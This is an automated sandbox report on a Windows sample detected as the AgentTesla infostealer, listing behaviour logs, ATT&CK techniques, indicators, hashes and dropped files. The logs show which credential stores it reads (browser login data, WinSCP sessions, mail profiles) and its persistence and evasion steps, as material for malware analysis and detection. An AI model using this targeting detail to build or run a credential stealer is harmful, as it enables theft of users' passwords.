                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\P020241901.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\P020241901.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\P020241901.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\P020241901.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\P020241901.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\P020241901.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 4204, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: P020241901.exe PID: 7180, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: VKkzqGUhsZwwm.exe PID: 7540, type: MEMORYSTR

                      ATT&CK tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      211
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 1410986 | Sample: P020241901.exe | Start date: 18/03/2024 | Architecture: WINDOWS | Score: 100

                      DNS/IP nodes: mail.cup.org.pk; _kerberos._tcp.dc._msdcs.cup.org.pk
                      Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures

                      Process tree:
                        P020241901.exe 7 started
                          dropped: C:\Users\user\AppData\...\VKkzqGUhsZwwm.exe, PE32
                          dropped: C:\Users\user\AppData\Local\...\tmpF9C9.tmp, XML
                          signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                          P020241901.exe 2 started
                            network: mail.cup.org.pk 203.82.48.116, ports 49708, 49711, 587, NAYATEL-PKNayatelPvtLtdPK Pakistan
                          powershell.exe 23 started
                            conhost.exe started
                            WmiPrvSE.exe started
                          powershell.exe 23 started
                            conhost.exe started
                          schtasks.exe 1 started
                            conhost.exe started
                        VKkzqGUhsZwwm.exe 5 started
                          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                          VKkzqGUhsZwwm.exe started
                            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                          schtasks.exe started
                            conhost.exe started

                      Source | Detection | Scanner | Label | Link
                      P020241901.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                      P020241901.exe | 100% | Avira | HEUR/AGEN.1306659
                      P020241901.exe | 100% | Joe Sandbox ML
                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | 100% | Avira | HEUR/AGEN.1306659
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | 100% | Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://mail.cup.org.pk | 0% | Avira URL Cloud | safe
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      mail.cup.org.pk | 203.82.48.116 | true | true | | unknown
                      _kerberos._tcp.dc._msdcs.cup.org.pk | unknown | unknown | false | | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://account.dyn.com/ | P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | P020241901.exe, 00000000.00000002.2001137973.0000000002581000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000A.00000002.2042466300.0000000002679000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      http://mail.cup.org.pk | P020241901.exe, 00000009.00000002.3234380229.0000000002A58000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3233407833.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                               IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                               203.82.48.116 | mail.cup.org.pk | Pakistan | | 23674 | NAYATEL-PKNayatelPvtLtdPK | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1410986
                              Start date and time:2024-03-18 14:31:27 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:17
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:P020241901.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@19/15@2/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 174
                              • Number of non-executed functions: 10
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                               • Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: P020241901.exe
                               Time | Type | Description
                               14:32:11 | API Interceptor | 103x Sleep call for process: P020241901.exe modified
                               14:32:13 | API Interceptor | 34x Sleep call for process: powershell.exe modified
                               14:32:14 | Task Scheduler | Run new task: VKkzqGUhsZwwm path: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                               14:32:16 | API Interceptor | 90x Sleep call for process: VKkzqGUhsZwwm.exe modified
                               Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                               203.82.48.116 | SPO-2344564.exe | Get hash | malicious | AgentTesla | Browse
                                 Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                 mail.cup.org.pk | SPO-2344564.exe | Get hash | malicious | AgentTesla | Browse
                                 • 203.82.48.116
                                 Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                 NAYATEL-PKNayatelPvtLtdPK | 1xGvWmAmvc.elf | Get hash | malicious | Unknown | Browse
                                 • 115.186.147.79
                                 NAYATEL-PKNayatelPvtLtdPK | 28SY8i9x72.elf | Get hash | malicious | Mirai | Browse
                                 • 115.186.147.68
                                 NAYATEL-PKNayatelPvtLtdPK | SPO-2344564.exe | Get hash | malicious | AgentTesla | Browse
                                 • 203.82.48.116
                                 NAYATEL-PKNayatelPvtLtdPK | ox0CSfGwkZ.elf | Get hash | malicious | Mirai | Browse
                                 • 58.65.166.34
                                 NAYATEL-PKNayatelPvtLtdPK | huhu.x86.elf | Get hash | malicious | Mirai, Okiru | Browse
                                 • 115.186.172.43
                                 NAYATEL-PKNayatelPvtLtdPK | 6G66kSe2A4.elf | Get hash | malicious | Mirai | Browse
                                 • 115.186.147.23
                                 NAYATEL-PKNayatelPvtLtdPK | UX1Kgk69dt.elf | Get hash | malicious | Unknown | Browse
                                 • 115.186.147.71
                                 NAYATEL-PKNayatelPvtLtdPK | fZZgQUTO36.elf | Get hash | malicious | Mirai | Browse
                                 • 115.186.172.87
                                 NAYATEL-PKNayatelPvtLtdPK | oBnUnwroXT.elf | Get hash | malicious | Mirai | Browse
                                 • 115.186.172.48
                                 NAYATEL-PKNayatelPvtLtdPK | sora.arm7.elf | Get hash | malicious | Mirai | Browse
                                 • 115.186.172.37
                                No context
                                No context
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380747059108785
                                Encrypted:false
                                SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:lGLHxvIIwLgZ2KRHWLOugss
                                MD5:6557859169C38B3271B0895BF83DB40D
                                SHA1:E5D44C6EBB6ABEA6A2E26FE81605C7BF8F903843
                                SHA-256:547BADA37C7E136DFB5EA88928F9BFAF56C50DF2BB1E46628EACB8D1E7CDFD93
                                SHA-512:CCC9D1D601F0F15453ED0EB7B7AEAB3B9B56C048E485E351CBF33FEF2306837019AB5206ED4D84873A35529FB9721BC1B9A222B7EC7EA7EC9DE58831D99EA730
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1586
                                Entropy (8bit):5.124429139984825
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgergYrFdOFzOzN33ODOiDdKrsuT3v
                                MD5:D74CF001840614DB5C957E2A1934367F
                                SHA1:023F250939860EF87F40774E615B765C65364A65
                                SHA-256:F1DE5CA103033A002DD48D00DCB9E3ECB30738BD12C7DF1B244A99C4E8092296
                                SHA-512:537BA2C07C10CBAC8382E41DD4A37574A2074542F2F9A9383288AB451766E97E6040322AC6DE2E9D90E4B37679A5F69C65C850FDD7FB7154132FAE02C74FF857
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                Process:C:\Users\user\Desktop\P020241901.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1586
                                Entropy (8bit):5.124429139984825
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgergYrFdOFzOzN33ODOiDdKrsuT3v
                                MD5:D74CF001840614DB5C957E2A1934367F
                                SHA1:023F250939860EF87F40774E615B765C65364A65
